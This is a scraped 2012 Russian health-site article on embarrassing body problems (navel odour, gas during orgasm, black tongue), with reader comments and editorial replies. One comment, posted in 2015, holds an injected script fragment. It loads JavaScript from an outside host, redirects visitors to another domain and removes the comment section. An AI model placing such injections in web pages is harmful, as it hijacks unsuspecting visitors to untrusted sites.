Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Стыдно рассказать  >>  Стыдно рассказать
 
Обратная связь
 

Стыдно рассказать

Размер шрифта
22 марта 2012 10:00
  • google_analytics: false
  • Нравится

Существуют проблемы тела, которые пациенты стесняются излагать врачу. Но решение проблем может оказаться простым.

1 

  1. Неприятный запах из пупка

Пупок – углубление на поверхности нашего тела. Содержание пупка: нитки, пот, грязь, бактерии. Нитки (точнее, ворсинки) попадают с одежды, пот постоянно продуцируется кожей, грязь скапливается со временем, и всё это становится благоприятной средой для размножения бактерий.

Пупочная ямка формируется у каждого человека индивидуально, в зависимости от того, как произошла перевязка пуповины. При мытье в душе или ванной не все «закоулки» пупка могут быть полноценно обработаны. Поэтому он может стать источником плохого запаха.

Что делать

Для обработки глубокого пупка удобно пользоваться ватными палочками, смоченными в слабом спиртовом растворе. Так осуществляется чистка одновременно с дезинфекцией пупочной ямки. Чтобы неприятный запах не возвращался, следует промывать пупок всякий раз, принимая душ.

1 

  1. Выход кишечных газов во время оргазма

Процесс исторжения кишечных газов происходит постоянно и происходит с каждым. Но этот процесс сознательно сдерживается по этическим соображениям. Мы контролируем свои потребности, находясь в социальных рамках общества.

Во время оргазма контроль над телом может быть ненадолго потерян, и это – нормальное явление.

Что делать

Если недержание газов во время оргазма является для человека большой проблемой и мешает жить, следует откорректировать свое питание. Можно хотя бы за сутки до встречи просто исключить из рациона продукты, способствующие повышенному газообразованию (капуста, бобовые, молочные продукты и газировки).

1

  1. Черный язык

Бывают ситуации в жизни, когда язык чернеет от съеденных продуктов (черноплодная рябина). Это связано со строением поверхности языка. Красящий продукт застревает в ворсинках слизистой, придавая языку тот или иной цвет.

Что делать

Удалить остатки съеденного со спинки языка можно обычной зубной щеткой или специальным скребком для языка. Предварительно инструмент лучше обмакнуть в порошок соды. 
 


Сюжеты по теме:
Нормальный ли я? Проблемы, которые мы стесняемся обсуждать

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

26 марта 2012 в 18:12

Цитировать   |   Пожаловаться

вам больше не о чем рассказать, как только про вонючий пупок и пуканье после оргазма?

Гость 26 марта 2012 в 18:12
вам больше не о чем рассказать
 Отнюдь. На сайте очень много РАЗНЫХ материалов. 

3 - Гость

30 марта 2012 в 13:40

Цитировать   |   Пожаловаться

Никогда ни от кого не слышал, что вообще такая проблема может быть : пуканье после оргазма. Эта тема выбрана для обсуждения, поскольку Малышеву беспокоит (в титрах передачи написано, что автор и ведущая)? С какого перепуга именно об этом? Другие проблемы уже все решены?

Гость 30 марта 2012 в 13:40
Другие проблемы уже все решены
 На сайте огромное количество РАЗНЫХ материалов по РАЗНЫМ темам. 

5 - Гость

07 апреля 2012 в 22:35

Цитировать   |   Пожаловаться

Я ежедневно посещаю ваш сайт вот уже почти два года, прочла почти все материалы. В самом деле раньше они были очень интересными и информативными. А вот такие статьи из передачи "Жить здорово" это просто бред. Смешно. Вам самим не стыдно, что вы уже до Геннадия Малахова опустились. Над вами смеются (ролик про свитер разорвал Интернет). При чем эти самые РАЗНЫЕ материалы на РАЗНЫЕ темы, которые я читала в прошлом году сейчас недоступны почему-то(((( Потеряла интерес к сайту и уважение к ведущей. Если у вас есть лишние деньги на передачу "Жить здорово" лучше пустите их на благотворительность в пользу больных детей.

Гость 07 апреля 2012 в 22:35
сейчас недоступны почему-то
 Если все же зайдете еще на сайт, пожалуйста, уточните какие материалы стали недоступными, редакция постарается это исправить. 

7 - zzzzzz

30 июня 2015 в 23:48

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.